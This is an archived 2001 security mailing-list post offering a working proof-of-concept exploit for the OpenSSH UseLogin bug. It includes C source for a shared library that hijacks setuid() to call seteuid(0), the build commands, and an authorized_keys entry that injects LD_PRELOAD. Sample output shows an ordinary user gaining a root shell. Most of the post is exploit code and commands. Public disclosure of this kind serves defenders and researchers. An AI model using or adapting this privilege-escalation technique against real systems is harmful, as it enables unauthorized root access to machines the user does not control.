OpenSSH UseLogin proof of concept exploit

From: [WaR] (warat_private)
Date: Wed Dec 05 2001 - 16:34:34 PST

Next message: Kerry: "Re: IE Denial of service (sorta)"

Previous message: Matthew G. Marsh: "CERT Conference 2002 Call for Presentations"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--[ OpenSSH UseLogin bug proof of concept exploit ]--
  by [WaR] <warat_private> / http://www.genhex.org


--[ Intro ]--

 I was very curious in finding out how to exploit this problem. Although
 I don't think anyone uses this feature, I looked into the matter anyway.
 Here it goes. It was tested on the following platforms:
  - Slackware 7.1 with OpenSSH3.0p1
  - RedHat 7.1 with OpenSSH_2.9p2
  - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
  - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
 The exploit should work as long as UseLogin does. YMMV.

 This is based on libroot from squidgeat_private,
 published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
 you thought it wouldn't happen again...).

 Kudos to pmsacat_private for his help figuring out the problem with
 the Slackware UseLogin, testing on OpenBSD, and giving the ideia for
 the seteuid(0) (it originally was a system("/bin/sh");).

--[ Code ]--

 Create a lib.c file with the next content:

 ---8<---
 #include <stdio.h>
 int setuid(int uid){
   printf("setuid() called...\n");
   seteuid(0);
 }
 ---8<---

 Compile it into a library:
 gcc -c -o lib.o lib.c
 ld -shared -o libroot.so lib.o
 chmod 755 ./libroot.so


 Now, for the tricky (*g*) part...

 You must have an account on the machine, and create an entry
 on $HOME/.ssh/authorized_keys (or authorized_keys2) with:

 environment="LD_PRELOAD=<your home>/libroot.so" <your public key>

 When sshd receives your connection, it will export this variable
 into the environment *BEFORE* running login. Somewhere after this,
 it executes a setuid. When it does, it makes a seteuid(0).

 $ id
 uid=1000(war) gid=100(users) groups=100(users)
 $ ssh war@localhost
 Enter passphrase for key '/home/war/.ssh/id_dsa':
 sh-2.04# id
 uid=0(root) gid=100(users) groups=100(users)


 It also works remotely. Anyway, you _MUST_ have an account on
 the victim machine so you can setup the enviroment, and login.
 And obviously (duh) it must have UseLogin enabled.

 That's all.


 shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.



-- [WaR]
"if you can't hack it, hit it with a hammer"

Next message: Kerry: "Re: IE Denial of service (sorta)"
Previous message: Matthew G. Marsh: "CERT Conference 2002 Call for Presentations"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Dec 05 2001 - 17:02:39 PST